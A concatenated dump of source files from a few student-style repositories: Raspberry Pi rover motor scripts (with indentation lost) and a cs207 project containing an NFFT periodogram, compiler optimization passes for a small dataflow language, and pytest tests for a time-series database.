elif object_distance > obstacle:
#Drive forward
continue
when_object_in_front()
```
#### File: Rover-projects/autonomous rover #2/a2_rover4.py
```python
import RPi.GPIO as GPIO
from time import sleep
x = 100
#en changes speed of motor
enA = 25
enB = 16
enC = 26
enD = 22
#bottom right motor - motor1
in1 = 24
in2 = 23
#top right motor - motor 2
in3 = 20
in4 = 21
#top left motor - motor 3
in1_2 = 19
in2_2 = 13
#bottom left motor - motor 4
in3_2 = 17
in4_2 = 27
GPIO.setmode(GPIO.BCM)
#motor 1
GPIO.setup(in1,GPIO.OUT)
GPIO.setup(in2,GPIO.OUT)
GPIO.setup(enA,GPIO.OUT)
p1 = GPIO.PWM(enA,1000)
p1.start(25)
#motor 2
GPIO.setup(in3,GPIO.OUT)
GPIO.setup(in4,GPIO.OUT)
GPIO.setup(enB,GPIO.OUT)
p2 = GPIO.PWM(enB,1000)
p2.start(25)
#motor 3
GPIO.setup(in1_2,GPIO.OUT)
GPIO.setup(in2_2,GPIO.OUT)
GPIO.setup(enC,GPIO.OUT)
p3 = GPIO.PWM(enC,1000)
p3.start(25)
#motor 4
GPIO.setup(in3_2,GPIO.OUT)
GPIO.setup(in4_2,GPIO.OUT)
GPIO.setup(enD,GPIO.OUT)
p4 = GPIO.PWM(enD,1000)
p4.start(25)
def forward():
print("going forwards")
p1.ChangeDutyCycle(x)
p2.ChangeDutyCycle(x)
p3.ChangeDutyCycle(x)
p4.ChangeDutyCycle(x)
GPIO.output(in3,GPIO.HIGH)
GPIO.output(in4,GPIO.LOW)
GPIO.output(in1,GPIO.HIGH)
GPIO.output(in2,GPIO.LOW)
GPIO.output(in1_2,GPIO.LOW)
GPIO.output(in2_2,GPIO.HIGH)
GPIO.output(in3_2,GPIO.LOW)
GPIO.output(in4_2,GPIO.HIGH)
def backward():
print("going backwards")
GPIO.output(in3,GPIO.LOW)
GPIO.output(in4,GPIO.HIGH)
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.HIGH)
GPIO.output(in1_2,GPIO.HIGH)
GPIO.output(in2_2,GPIO.LOW)
GPIO.output(in3_2,GPIO.HIGH)
GPIO.output(in4_2,GPIO.LOW)
def stop():
print("stopping")
GPIO.output(in3,GPIO.LOW)
GPIO.output(in4,GPIO.LOW)
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.LOW)
GPIO.output(in1_2,GPIO.LOW)
GPIO.output(in2_2,GPIO.LOW)
GPIO.output(in3_2,GPIO.LOW)
GPIO.output(in4_2,GPIO.LOW)
def turn_left():
print("turning left")
GPIO.output(in3,GPIO.HIGH)
GPIO.output(in4,GPIO.LOW)
GPIO.output(in1,GPIO.HIGH)
GPIO.output(in2,GPIO.LOW)
GPIO.output(in1_2,GPIO.LOW)
GPIO.output(in2_2,GPIO.LOW)
GPIO.output(in3_2,GPIO.LOW)
GPIO.output(in4_2,GPIO.LOW)
def turn_right():
print("turning right")
GPIO.output(in3,GPIO.LOW)
GPIO.output(in4,GPIO.LOW)
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.LOW)
GPIO.output(in1_2,GPIO.LOW)
GPIO.output(in2_2,GPIO.HIGH)
GPIO.output(in3_2,GPIO.LOW)
GPIO.output(in4_2,GPIO.HIGH)
def sharp_left():
    # left wheels forwards while right wheels backwards ---????
    pass
while(1):
command = input("Enter 's' to start the rover: ")
if command == 's':
forward()
sleep(3)
backward()
sleep(3)
stop()
sleep(3)
turn_left()
sleep(10)
turn_right()
sleep(10)
stop()
else:
print("You entered the wrong command. Try again")
```
#### File: Rover-projects/autonomous rover #3/a3_rover2.py
```python
from gpiozero import LineSensor
import RPi.GPIO as GPIO
from time import sleep
x = 75
x1 = 0
x2 = 100
sensor1 = LineSensor(26)
sensor2 = LineSensor(16)
enA = 25
enB = 12
in1 = 24
in2 = 23
in3 = 20
in4 = 21
GPIO.setmode(GPIO.BCM)
#motor 1
GPIO.setup(in1,GPIO.OUT)
GPIO.setup(in2,GPIO.OUT)
GPIO.setup(enA,GPIO.OUT)
p1 = GPIO.PWM(enA,1000)
p1.start(25)
#motor 2
GPIO.setup(in3,GPIO.OUT)
GPIO.setup(in4,GPIO.OUT)
GPIO.setup(enB,GPIO.OUT)
p2 = GPIO.PWM(enB,1000)
p2.start(25)
def forward():
print("going forwards")
p1.ChangeDutyCycle(x)
p2.ChangeDutyCycle(x)
GPIO.output(in3,GPIO.LOW)
GPIO.output(in4,GPIO.HIGH)
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.HIGH)
def turn_left():
print("turning left")
p1.ChangeDutyCycle(x1)
p2.ChangeDutyCycle(x2)
GPIO.output(in3,GPIO.LOW)
GPIO.output(in4,GPIO.HIGH)
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.LOW)
def turn_right():
print("turning right")
p1.ChangeDutyCycle(x2)
p2.ChangeDutyCycle(x1)
GPIO.output(in3,GPIO.LOW)
GPIO.output(in4,GPIO.LOW)
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.HIGH)
def stop():
print("stopping")
GPIO.output(in3,GPIO.LOW)
GPIO.output(in4,GPIO.LOW)
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.LOW)
def stay_on_line():
print("staying on line")
forward()
def straighten():
print("straightening")
stop()
sleep(1)
turn_left()
sleep(1)
stop()
sleep(1)
turn_right()
sleep(1)
stop()
sleep(1)
sensor1.when_line = stay_on_line
sensor1.when_no_line = straighten
sensor2.when_line = stay_on_line
sensor2.when_no_line = straighten
``` |
{
"source": "2065983Y/spinner",
"score": 3
} |
#### File: 2065983Y/spinner/Block.py
```python
class Block(object):
def __init__(self, name, type, x, y):
self.name = name
self.type = type
``` |
{
"source": "207leftovers/cs207project",
"score": 3
} |
#### File: cs207project/procs/_nfft.py
```python
import numpy as np
from numpy.fft import *
def _spread(y, yy, n, x, m):
"""
Given an array yy, extirpolate a value y into
m actual array elements that best approximate the array element number x.
Need to call for every value in an array(In place operations)
Input -
y - Input value
yy - Actual array to which value is to be extirpolated
n - Maximum frequency
x - Element number being approximated
m - Number of points to be interpolated for 1/4th cycle.
"""
nfac=[0,1,1,2,6,24,120,720,5040,40320,362880]
if m > 10. :
print('factorial table too small in spread')
return
ix=int(x)
if x == float(ix):
yy[ix]=yy[ix]+y
else:
ilo = int(x-0.5*float(m)+1.0)
ilo = min( max( ilo , 1 ), n-m+1 )
ihi = ilo+m-1
nden = nfac[m]
fac=x-ilo
for j in range(ilo+1,ihi+1):
fac = fac*(x-j)
yy[ihi] = yy[ihi] + y*fac/(nden*(x-ihi))
for j in range(ihi-1,ilo-1,-1):
nden=(nden/(j+1-ilo))*(j-ihi)
yy[j] = yy[j] + y*fac/(nden*(x-j))
def _nfft(mag, time,ofac,hifac, MACC=4):
"""
Input-
mag - List of magnitudes
time - List of time values corresponding to the magnitude
ofac - Oversampling factor
hifac - Highest frequency for which periodogram is to be constructed.
Output-
Wk1 : An array of frequencies.
Wk2 : An array of corresponding values of the periodogram.
nout : Wk1 & Wk2 dimensions (number of calculated frequencies)
"""
n = len(time)
    # the magnitude and time arrays must be the same length for the transform to work
    assert n == len(mag)
    # nout must be an integer because it is used below to slice the FFT output
    nout = int(0.5*ofac*hifac*n)
nfreqt = ofac*hifac*n*MACC #Size the FFT as next power
nfreq = 64 # of 2 above nfreqt.
while nfreq < nfreqt:
nfreq = 2*nfreq
ndim = 2*nfreq
#Compute the mean, variance
mean = np.mean(mag)
##sample variance because the divisor is N-1
var = ((mag-mean)**2).sum()/(len(mag)-1)
# and range of the data.
xmin = time.min()
xmax = time.max()
xdif = xmax-xmin
fac = ndim/(xdif*ofac)
fndim = ndim
ck = ((time-xmin)*fac) % fndim
ckk = (2.0*ck) % fndim
#extirpolate the data
wk1 = np.zeros(ndim, dtype='complex')
wk2 = np.zeros(ndim, dtype='complex')
#calling spread in order to compute FFT later
for j in range(0, n):
_spread(mag[j]-mean,wk1,ndim,ck[j],MACC)
_spread(1.0,wk2,ndim,ckk[j],MACC)
#Take the Fast Fourier Transforms
wk1 = ifft( wk1 )*len(wk1)
wk2 = ifft( wk2 )*len(wk1)
wk1 = wk1[1:nout+1]
wk2 = wk2[1:nout+1]
real_wk1 = wk1.real
imag_wk1 = wk1.imag
real_wk2 = wk2.real
imag_wk2 = wk2.imag
#Diff factor
df = 1.0/(xdif*ofac)
#Compute the Lomb value for each frequency
hypo = 2.0 * abs(wk2)
#hc2wt - Represents half cos(2*w*t) term
#hs2wt - Represents half sin(2*w*t) term
hc2wt = real_wk2/hypo
hs2wt = imag_wk2/hypo
#cwt - Represents cos(w*t) term
#swt - Represents sin(w*t) term
cwt = np.sqrt(0.5+hc2wt)
swt = np.sign(hs2wt)*(np.sqrt(0.5-hc2wt))
#den - calculating denominator in order to compute the sin and cos term
den = 0.5*n+hc2wt*real_wk2+hs2wt*imag_wk2
#cterm - cos term coefficients
#sterm - sin term coefficients
cterm = (cwt*real_wk1+swt*imag_wk1)**2./den
sterm = (cwt*imag_wk1-swt*real_wk1)**2./(n-den)
#Computing the final periodogram values and building the scale of frequencies
wk1 = df*(np.arange(nout, dtype='float')+1.)
wk2 = (cterm+sterm)/(2.0*var)
return wk1, wk2, nout
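# A hedged usage sketch (not part of the original module): evaluate the
# periodogram of an unevenly sampled 0.1 Hz sinusoid. The sample count and the
# ofac/hifac values below are illustrative choices, not project defaults.
if __name__ == '__main__':
    rng = np.random.RandomState(0)
    t = np.sort(rng.uniform(0.0, 100.0, 200))
    mag = np.sin(2.0 * np.pi * 0.1 * t)
    freqs, power, nout = _nfft(mag, t, ofac=4, hifac=1)
    print('peak frequency ~ {:.3f} (expect ~0.1)'.format(freqs[np.argmax(power)]))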
```
#### File: cs207project/pype/optimize.py
```python
from .fgir import *
from .error import *
# Optimization pass interfaces
class Optimization(object):
def visit(self, obj): pass
class FlowgraphOptimization(Optimization):
'''Called on each flowgraph in a FGIR.
May modify the flowgraph by adding or removing nodes (return a new Flowgraph).
If you modify nodes, make sure inputs, outputs, and variables are all updated.
May NOT add or remove flowgraphs.'''
pass
class TopologicalFlowgraphOptimization(Optimization):
'''Called on each flowgraph in a FGIR, in dependent order.
Components which are used by other components will be called first.'''
pass
class NodeOptimization(Optimization):
'''Called on each node in a FGIR.
May modify the node (return a new Node object, and it will be assigned).
May NOT remove or add nodes (use a component pass).'''
pass
class TopologicalNodeOptimization(NodeOptimization): pass
# Optimization pass implementations
class PrintIR(TopologicalNodeOptimization):
'A simple "optimization" pass which can be used to debug topological sorting'
def visit(self, node):
print(str(node))
class AssignmentEllision(FlowgraphOptimization):
'''Eliminates all assignment nodes.
Assignment nodes are useful for the programmer to reuse the output of an
expression multiple times, and the lowering transformation generates explicit
flowgraph nodes for these expressions. However, they are not necessary for
execution, as they simply forward their value. This removes them and connects
their pre- and post-dependencies.'''
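    # Illustrative effect on a tiny flowgraph (node names are made up):
    #   input x -> assignment a -> output y      becomes      input x -> output y
    # every consumer of an assignment node is rewired to the assignment's own
    # inputs, and any flowgraph variable that pointed at it is redirected too.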
def visit(self, flowgraph):
# Check all the nodes in the flowgraph and remove assignment nodes
to_remove = []
# Keeps track of the predecessors to nodes to be removed
to_remove_inputs = {}
# Find all assignment nodes to remove
for node in flowgraph.nodes.keys():
# If the node is an assignment, eliminate it
if flowgraph.nodes[node].type == FGNodeType.assignment:
to_remove.append(node)
to_remove_inputs[node] = flowgraph.nodes[node].inputs
# Update the nodes that are before and after the assignment nodes
for node in flowgraph.nodes.keys():
for to_remove_node in to_remove_inputs:
if to_remove_node in flowgraph.nodes[node].inputs:
flowgraph.nodes[node].inputs.remove(to_remove_node)
flowgraph.nodes[node].inputs.extend(to_remove_inputs[to_remove_node])
for var in flowgraph.variables:
node = flowgraph.variables[var]
if node in to_remove:
flowgraph.variables[var] = to_remove_inputs[node][0]
# Clear out the nodes that should be removed
for node_to_remove in to_remove:
del flowgraph.nodes[node_to_remove]
return flowgraph
class DeadCodeElimination(FlowgraphOptimization):
'''Eliminates unreachable expression statements.
Statements which never affect any output are effectively useless, and we call
these "dead code" blocks. This optimization removes any expressions which can
be shown not to affect the output.
NOTE: input statements *cannot* safely be removed, since doing so would change
the call signature of the component. For example, it might seem that the input
x could be removed:
{ component1 (input x y) (output y) }
but imagine this component1 was in a file alongside this one:
{ component2 (input a b) (:= c (component a b)) (output c) }
By removing x from component1, it could no longer accept two arguments. So in
this instance, component1 will end up unmodified after DCE.'''
def visit(self, flowgraph):
# Check all the nodes in the flowgraph and remove dead nodes
# Start with assuming all nodes should be removed, and then
# work backwards from the outputs to remove unused ones
to_remove = list(flowgraph.nodes.keys())
# Need to copy this list, otherwise you are modifying the originals
to_check = flowgraph.outputs[:]
while len(to_check) > 0:
cur = to_check.pop()
to_remove.remove(cur)
# Add all previous to the to_check queue
for key in flowgraph.nodes[cur].inputs:
if key in to_remove and key not in to_check:
to_check.append(key)
# Now eliminate whatever is left and hasn't been visited
if len(to_remove) > 0:
print("Removing nodes", to_remove)
for key in to_remove:
del flowgraph.nodes[key]
to_remove_vars = []
# Remove unused variables as well
for var in flowgraph.variables:
node = flowgraph.variables[var]
if node in to_remove:
to_remove_vars.append(var)
for var in to_remove_vars:
del flowgraph.variables[var]
return flowgraph
class InlineComponents(TopologicalFlowgraphOptimization):
'''Replaces every component invocation with a copy of that component's flowgraph.
Topological order guarantees that we inline components before they are invoked.'''
def __init__(self):
self.component_cache = {}
def visit(self, flowgraph):
for (cnode_id, cnode) in [(nid,n) for (nid,n) in flowgraph.nodes.items() if n.type==FGNodeType.component]:
target = self.component_cache[cnode.ref]
# Add a copy of every node in target flowgraph
id_map = {} # maps node id's in the target to node id's in our flowgraph
for tnode in target.nodes.values():
if tnode.type==FGNodeType.input or tnode.type==FGNodeType.output:
newtype = FGNodeType.forward
else:
newtype = tnode.type
n = flowgraph.new_node(newtype, ref=tnode.ref)
id_map[tnode.nodeid] = n.nodeid
# Connect all copies together
for tid,tnode in target.nodes.items():
flowgraph.nodes[id_map[tid]].inputs = [id_map[i] for i in tnode.inputs]
# Link inputs of cnode to inputs of target flowgraph
for cnode_input,targ_input in zip(cnode.inputs, target.inputs):
flowgraph.nodes[id_map[targ_input]].inputs = [cnode_input]
# Link output of target flowgraph to outputs of cnode
for oid,onode in flowgraph.nodes.items():
if cnode_id in onode.inputs:
onode.inputs[onode.inputs.index(cnode_id)] = id_map[target.outputs[0]]
# Remove all other references to cnode in flowgraph
del flowgraph.nodes[cnode_id]
victims = [s for s,nid in flowgraph.variables.items() if nid==cnode_id]
for v in victims:
del flowgraph.variables[v]
self.component_cache[flowgraph.name] = flowgraph
return flowgraph
```
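The DeadCodeElimination pass above keeps only nodes reachable backwards from the flowgraph outputs. The same reachability idea is easy to see on a plain adjacency dict; the sketch below is standalone and illustrative, not part of pype.
```python
def reachable_from_outputs(inputs_of, outputs):
    """Return the set of nodes reachable by walking input edges back from the outputs."""
    keep, stack = set(), list(outputs)
    while stack:
        node = stack.pop()
        if node in keep:
            continue
        keep.add(node)
        stack.extend(inputs_of.get(node, []))
    return keep

# node -> list of its input nodes; 'dead' never feeds anything that reaches the output
inputs_of = {'out': ['mul'], 'mul': ['a', 'b'], 'a': [], 'b': [], 'dead': ['a']}
live = reachable_from_outputs(inputs_of, ['out'])
print(sorted(set(inputs_of) - live))   # ['dead'] is what would be eliminated
```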
#### File: cs207project/pype/semantic_analysis.py
```python
from pype.ast import *
from pype.error import *
class PrettyPrint(ASTVisitor):
def __init__(self):
pass
def visit(self, node):
print(node.__class__.__name__)
class CheckSingleAssignment(ASTVisitor):
def __init__(self):
self.component_names = []
self.names_used = []
def visit(self, node):
#when visiting a component, reset the list of names used inside it and check
#that the component name has not already been taken
if isinstance(node, ASTComponent):
self.names_used = []
new_component_name = node.name.name
if new_component_name in self.component_names:
raise PypeSyntaxError('Component name: ' + new_component_name +' has already been taken')
else:
self.component_names.append(new_component_name)
elif isinstance(node, ASTAssignmentExpr):
name = node.binding.name
if name in self.names_used:
raise PypeSyntaxError('Node name: ' + name + ' has already been taken')
else:
self.names_used.append(name)
elif isinstance(node, ASTInputExpr):
for input_expression in node.children:
name = input_expression.name
if name in self.names_used:
raise PypeSyntaxError('Node name: ' + name + ' has already been taken')
else:
self.names_used.append(name)
class CheckSingleIOExpression(ASTVisitor):
def __init__(self):
self.component = None
self.component_has_input = False
self.component_has_output = False
def visit(self, node):
if isinstance(node, ASTComponent):
self.component = node.name.name
self.component_has_input = False
self.component_has_output = False
elif isinstance(node, ASTInputExpr):
if self.component_has_input:
raise PypeSyntaxError('Component '+str(self.component)+' has multiple input expressions')
self.component_has_input = True
elif isinstance(node, ASTOutputExpr):
if self.component_has_output:
raise PypeSyntaxError('Component '+str(self.component)+' has multiple output expressions')
self.component_has_output = True
class CheckUndefinedVariables(ASTVisitor):
def __init__(self, symtab):
self.symtab = symtab
self.scope=None
def visit(self, node):
if isinstance(node, ASTComponent):
self.scope = node.name.name
elif isinstance(node, ASTID):
print(node.name)
if self.symtab.lookupsym(node.name, scope=self.scope) is None:
raise PypeSyntaxError('Undefined variable: ' + str(node.name))
```
#### File: tests/procs/test_corr.py
```python
import numpy as np
np.random.seed(0)
from procs import _corr
from timeseries import TimeSeries
def test_tsmaker():
#Setting seed to equate the two timeseries
_,t1 = _corr.tsmaker(0.5, 0.1, 0.01)
assert(len(t1.values()) == 100)
def test_randomts():
t1 = _corr.random_ts(0.5)
assert(len(t1.values()) == 100)
def test_stand():
t1 = TimeSeries([1, 2, 3, 4], [40, 50, 60, 70])
val = _corr.stand(np.array(t1.values()), 55.0, 10)
assert(list(val) == [-1.5, -0.5, 0.5, 1.5])
def test_ccor():
#Testing the corr function independently
t1 = TimeSeries([1, 2, 3, 4], [40, 50, 60, 70])
t2 = TimeSeries([1, 2, 3, 4], [40, 50, 60, 70])
val = _corr.ccor(t1, t2)
assert(list(np.real(val)) == [12600, 12000, 11800, 12000])
assert(list(np.imag(val)) == [0, 0, 0, 0])
def test_maxcorr():
t1 = TimeSeries([1, 2, 3, 4], [40, 50, 60, 70])
t2 = TimeSeries([1, 2, 3, 4], [50, 60, 70, 40])
standts1 = _corr.stand(t1, t1.mean(), t1.std())
standts2 = _corr.stand(t2, t2.mean(), t2.std())
idx, mcorr = _corr.max_corr_at_phase(standts1, standts2)
#idx should be equal to one since the second ts is shifted by 1
assert(idx == 1)
assert(np.real(mcorr) == 4)
def test_kernelcorr():
t1 = TimeSeries([1, 2, 3, 4], [40, 50, 60, 70])
t2 = TimeSeries([1, 2, 3, 4], [40, 50, 60, 70])
standts1 = _corr.stand(t1, t1.mean(), t1.std())
standts2 = _corr.stand(t2, t2.mean(), t2.std())
#Kernel_corr should return a correlation of 1.0 since we use similar timeseries
assert(_corr.kernel_corr(standts1, standts2, mult=1) == 1.0)
```
#### File: tests/pype/test_fgir.py
```python
from pype import fgir
from pype.translate import SymbolTableVisitor, LoweringVisitor
from pype.optimize import *
from pype import lexer
from pype import parser
from pype import ast
from pype.semantic_analysis import CheckSingleAssignment, CheckSingleIOExpression, PrettyPrint, CheckUndefinedVariables
from timeseries import TimeSeries
input = """(import timeseries)
{ standardize
(input (TimeSeries t))
(:= mu (mean t))
(:= sig (std t))
(:= new_t (/ (- t mu) sig))
(output new_t)
}"""
ast = parser.parse(input, lexer=lexer)
syms = ast.walk( SymbolTableVisitor() )
ir = ast.mod_walk( LoweringVisitor(syms) )
standardize_graph = ir.graphs['standardize']
def test_nodes():
assert(standardize_graph.nodes['@N0'].nodeid == '@N0')
assert(standardize_graph.nodes['@N0'].inputs == [])
assert(standardize_graph.nodes['@N0'].ref == None)
assert(standardize_graph.nodes['@N0'].__repr__() == '<FGNodeType.input @N0<= : None>')
assert(standardize_graph.nodes['@N1'].nodeid == '@N1')
assert(standardize_graph.nodes['@N1'].inputs == ['@N0'])
assert(standardize_graph.nodes['@N1'].ref == TimeSeries.mean)
assert(standardize_graph.nodes['@N2'].nodeid == '@N2')
assert(standardize_graph.nodes['@N2'].inputs == ['@N1'])
assert(standardize_graph.nodes['@N2'].ref == None)
assert(standardize_graph.nodes['@N3'].nodeid == '@N3')
assert(standardize_graph.nodes['@N3'].inputs == ['@N0'])
assert(standardize_graph.nodes['@N3'].ref == TimeSeries.std)
assert(standardize_graph.nodes['@N4'].nodeid == '@N4')
assert(standardize_graph.nodes['@N4'].inputs == ['@N3'])
assert(standardize_graph.nodes['@N4'].ref == None)
assert(standardize_graph.nodes['@N5'].nodeid == '@N5')
assert(standardize_graph.nodes['@N5'].inputs == ['@N0', '@N2'])
assert(standardize_graph.nodes['@N5'].ref == TimeSeries.__sub__)
def test_topological_sort():
dotfile = standardize_graph.dotfile()
sorted_nodes = standardize_graph.topological_sort()
# Ensure that the dotfile print out hasn't been affected by topological sort
assert(dotfile == standardize_graph.dotfile())
# Check input is first
assert(sorted_nodes[0] == '@N0')
# Check output is last
assert(sorted_nodes[-1] == '@N8')
# Check some orderings
assert(sorted_nodes.index('@N5') > sorted_nodes.index('@N0'))
assert(sorted_nodes.index('@N5') > sorted_nodes.index('@N2'))
assert(sorted_nodes.index('@N4') > sorted_nodes.index('@N3'))
assert(sorted_nodes.index('@N2') > sorted_nodes.index('@N1'))
assert(sorted_nodes.index('@N1') > sorted_nodes.index('@N0'))
```
#### File: tests/pype/test_pcode.py
```python
import sys
import os
from pype.pipeline import *
from timeseries.TimeSeries import TimeSeries
from pype.pcode import PCodeGenerator
sys.path.append('/samples/')
input1 = """(import timeseries)
{ standardize
(input (TimeSeries t))
(:= mu (mean t))
(:= sig (std t))
(:= new_t (/ (- t mu) sig))
(output new_t)
}"""
def test_pcode_l():
time = []
values = []
for x in range(100):
time.append(x)
values.append(x-50)
a = TimeSeries(time, values)
ast = parser.parse(input1, lexer=lexer)
# Semantic analysis
ast.walk( CheckSingleAssignment() )
ast.walk( CheckSingleIOExpression() )
syms = ast.walk( SymbolTableVisitor() )
ast.walk( CheckUndefinedVariables(syms) )
# Translation
ir = ast.mod_walk( LoweringVisitor(syms) )
ir.flowgraph_pass( AssignmentEllision() )
ir.flowgraph_pass( DeadCodeElimination() )
ir.topological_flowgraph_pass( InlineComponents() )
# PCode Generation
pcodegen = PCodeGenerator()
ir.flowgraph_pass( pcodegen )
pcodes = pcodegen.pcodes
standardized_TS = pcodes['standardize'].run(a)
# Test the mean and standard deviation
assert(round(standardized_TS.mean(), 7) == 0)
assert(round(standardized_TS.std()-1, 7) == 0)
def test_pcode_2():
input2 = """{aer
(input b)
(:= a "a")
(output a)
}"""
ast = parser.parse(input2, lexer=lexer)
# Semantic analysis
ast.walk( CheckSingleAssignment() )
ast.walk( CheckSingleIOExpression() )
syms = ast.walk( SymbolTableVisitor() )
ast.walk( CheckUndefinedVariables(syms) )
# Translation
ir = ast.mod_walk( LoweringVisitor(syms) )
ir.flowgraph_pass( AssignmentEllision() )
ir.flowgraph_pass( DeadCodeElimination() )
ir.topological_flowgraph_pass( InlineComponents() )
# PCode Generation
pcodegen = PCodeGenerator()
ir.flowgraph_pass( pcodegen )
pcodes = pcodegen.pcodes
a = pcodes['aer'].run('b')
assert(a == '"a"')
```
#### File: tests/tsdb/test_tsdb_server.py
```python
from tsdb import TSDBServer, DictDB, TSDBClient, TSDBProtocol
import timeseries as ts
from concurrent.futures import ThreadPoolExecutor, thread
from tsdb.tsdb_ops import *
from collections import defaultdict, OrderedDict
from importlib import import_module
import time
import numpy as np
import asynctest
import procs
identity = lambda x: x
schema = {
'pk': {'convert': identity, 'index': None}, #will be indexed anyways
'ts': {'convert': identity, 'index': None},
'order': {'convert': int, 'index': 1},
'blarg': {'convert': int, 'index': 1},
'useless': {'convert': identity, 'index': None},
'mean': {'convert': float, 'index': 1},
'std': {'convert': float, 'index': 1},
'vp': {'convert': bool, 'index': 1}
}
NUMVPS = 5
# we augment the schema by adding columns for 5 vantage points
for i in range(NUMVPS):
schema["d_vp-{}".format(i)] = {'convert': float, 'index': 1}
class Test_TSDB_Protocol():
def test_protocol(self):
db = DictDB(schema, 'pk')
server = TSDBServer(db)
prot = TSDBProtocol(server)
# Dumb server tests
assert(server.db == db)
assert(server.port == 9999)
t1 = [0,1,2,3,4]
v1 = [1.0,2.0,3.0,2.0,1.0]
ats1 = ts.TimeSeries(t1, v1)
t2 = [10,11,12,13,14]
v2 = [-1.0,-2.0,-3.0,-2.0,-1.0]
ats2 = ts.TimeSeries(t2, v2)
# Test TSDBOp_InsertTS
insert_op = {}
insert_op['pk'] = 1
insert_op['ts'] = ats1
insert_op['op'] = 'insert_ts'
InsertedTS = TSDBOp_InsertTS(1, ats1)
assert(insert_op == InsertedTS)
# Test Protocol Insert
insert_return = prot._insert_ts(insert_op)
assert(insert_return['op'] == 'insert_ts')
assert(insert_return['status'] == TSDBStatus.OK)
assert(insert_return['payload'] == None)
inserted_row = server.db.rows[1]
assert(inserted_row['pk'] == 1)
assert(inserted_row['ts'] == ats1)
# Add some more data
prot._insert_ts(TSDBOp_InsertTS(2, ats1))
inserted_row = server.db.rows[2]
assert(inserted_row['ts'] == ats1)
# Test Protocol Upsert
upserted_meta = TSDBOp_UpsertMeta(2, {'ts': ats2, 'order': 1})
upsert_return = prot._upsert_meta(upserted_meta)
assert(upsert_return['op'] == 'upsert_meta')
assert(upsert_return['status'] == TSDBStatus.OK)
assert(upsert_return['payload'] == None)
# Test Protocol Select (None fields)
metadata_dict = {'pk': {'>': 0}}
fields = None
additional = None
select_op = TSDBOp_Select(metadata_dict, fields, additional)
select_return = prot._select(select_op)
print("Here", select_return)
assert(select_return['op'] == 'select')
assert(select_return['status'] == TSDBStatus.OK)
assert(select_return['payload'][1] == {})
assert(select_return['payload'][2] == {})
# Test Protocol Select
metadata_dict = {'pk': {'>': 0}}
fields = ['ts']
additional = None
select_op = TSDBOp_Select(metadata_dict, fields, additional)
select_return = prot._select(select_op)
assert(select_return['op'] == 'select')
assert(select_return['status'] == TSDBStatus.OK)
assert(select_return['payload'][1]['ts'] == ats1)
assert(select_return['payload'][2]['ts'] == ats2)
# Test Add Trigger
add_trigger_op = TSDBOp_AddTrigger('stats', 'insert_ts', ['mean', 'std'], None)
prot._add_trigger(add_trigger_op)
mod = import_module('procs.stats')
storedproc = getattr(mod,'main')
assert(server.triggers['insert_ts'] == [('stats', storedproc, None, ['mean', 'std'])])
#prot._insert_ts(TSDBOp_InsertTS(3, ats1))
#time.sleep(1)
#inserted_row = server.db.rows[3]
#assert(inserted_row['mean'] == ats1)
#assert(inserted_row['std'] == ats1)
def test_protocol_delete(self):
db = DictDB(schema, 'pk')
server = TSDBServer(db)
prot = TSDBProtocol(server)
t1 = [0,1,2,3,4]
v1 = [1.0,2.0,3.0,2.0,1.0]
ats1 = ts.TimeSeries(t1, v1)
t2 = [10,11,12,13,14]
v2 = [-1.0,-2.0,-3.0,-2.0,-1.0]
ats2 = ts.TimeSeries(t2, v2)
insert_op = {}
insert_op['pk'] = 1
insert_op['ts'] = ats1
insert_op['op'] = 'insert_ts'
# Test Protocol Insert
insert_return = prot._insert_ts(insert_op)
assert(insert_return['op'] == 'insert_ts')
assert(insert_return['status'] == TSDBStatus.OK)
assert(insert_return['payload'] == None)
inserted_row = server.db.rows[1]
assert(inserted_row['pk'] == 1)
assert(inserted_row['ts'] == ats1)
insert_return2 = prot._insert_ts(insert_op)
assert(insert_return2['op'] == 'insert_ts')
assert(insert_return2['status'] == TSDBStatus.INVALID_KEY)
delete_op = {}
delete_op['pk'] = 1
delete_op['op'] = 'delete_ts'
delete_return = prot._delete_ts(delete_op)
assert(delete_return['op'] == 'delete_ts')
assert(delete_return['status'] == TSDBStatus.OK)
assert(delete_return['payload'] == None)
assert (len(server.db.rows) == 0)
delete_return2 = prot._delete_ts(delete_op)
assert(delete_return2['op'] == 'delete_ts')
assert(delete_return2['status'] == TSDBStatus.INVALID_KEY)
def test_protocol_triggers(self):
db = DictDB(schema, 'pk')
server = TSDBServer(db)
prot = TSDBProtocol(server)
# Test Add Trigger
add_trigger_op = TSDBOp_AddTrigger('stats', 'insert_ts', ['mean', 'std'], None)
prot._add_trigger(add_trigger_op)
mod = import_module('procs.stats')
storedproc = getattr(mod,'main')
assert(server.triggers['insert_ts'] == [('stats', storedproc, None, ['mean', 'std'])])
# Test delete Trigger
delete_trigger_op = TSDBOp_RemoveTrigger('stats', 'insert_ts')
prot._remove_trigger(delete_trigger_op)
mod = import_module('procs.stats')
storedproc = getattr(mod,'main')
assert(server.triggers['insert_ts'] == [])
def test_augmented_select(self):
db = DictDB(schema, 'pk')
server = TSDBServer(db)
prot = TSDBProtocol(server)
t1 = [0,1,2,3,4]
v1 = [1.0,2.0,3.0,2.0,1.0]
ats1 = ts.TimeSeries(t1, v1)
t2 = [10,11,12,13,14]
v2 = [-1.0,-2.0,-3.0,-2.0,-1.0]
ats2 = ts.TimeSeries(t2, v2)
insert_op = {}
insert_op['pk'] = 1
insert_op['ts'] = ats1
insert_op['op'] = 'insert_ts'
# Test Protocol Insert
insert_return = prot._insert_ts(insert_op)
assert(insert_return['op'] == 'insert_ts')
assert(insert_return['status'] == TSDBStatus.OK)
assert(insert_return['payload'] == None)
inserted_row = server.db.rows[1]
assert(inserted_row['pk'] == 1)
assert(inserted_row['ts'] == ats1)
# Test Protocol Select (None fields)
metadata_dict = {'pk': {'>': 0}}
fields = None
additional = None
aug_select_op = TSDBOp_AugmentedSelect('corr', ['mean', 'std'], [t2,v2], metadata_dict, additional )
aug_select_return = prot._augmented_select(aug_select_op)
assert(aug_select_return['op'] == 'augmented_select')
assert(aug_select_return['status'] == TSDBStatus.OK)
assert(aug_select_return['payload'] == {1: {'mean': 1.4142135623730403}})
```
#### File: tests/vptree/test_VPtrees.py
```python
from vptree import *
import numpy as np
